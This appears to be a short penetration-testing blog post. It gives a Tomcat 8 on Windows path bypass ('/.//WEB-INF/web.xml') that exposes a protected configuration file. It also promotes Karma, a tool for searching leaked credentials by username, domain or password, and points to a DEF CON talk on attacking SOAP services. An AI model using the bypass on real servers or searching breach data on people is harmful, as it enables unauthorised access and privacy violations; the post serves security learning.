Technique:
Quick and Easy Bypass for Tomcat 8 on Windows
https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK
Haven’t had a chance to use this yet, but I’m sure I will soon
Tool:
Karma
So awesome! Lets you search by username, domain or password.
For example I can search by username “gainsec” or “@gainsec.com” or “passwordforgainsec”
I’ve used this a bunch of times to find accounts that belong to the same person/organization even if they aren’t similar. Password reuse is bad! Their database isn’t especially huge but big enough to run things through. Especially if you get a hit in dehashed.
Lecture:
Defcon 19: Don’t Drop the SOAP: Real World Web Service Testing for Web Hackers
Lots of great information for attacking Simple Object Access Protocol (SOAP)!
Check out all the entries of this series!
- Technique Tool and Lecture #14
- Technique Tool and Lecture #13
- Technique, Tool and Lecture #12
- Technique, Tool and Lecture #11
- Technique Tool and Lecture #10
- Technique, Tool and Lecture #9
- Technique, Tool and Lecture #8
- Technique, Tool and Lecture #7
- Technique, Tool and Lecture #6
- Technique, Tool and Lecture #5
- Technique, Tool and Lecture #4
- Technique, Tool and Lecture #3
- Technique, Tool and Lecture #2
- Technique, Tool and Lecture #1
END TRANSMISSION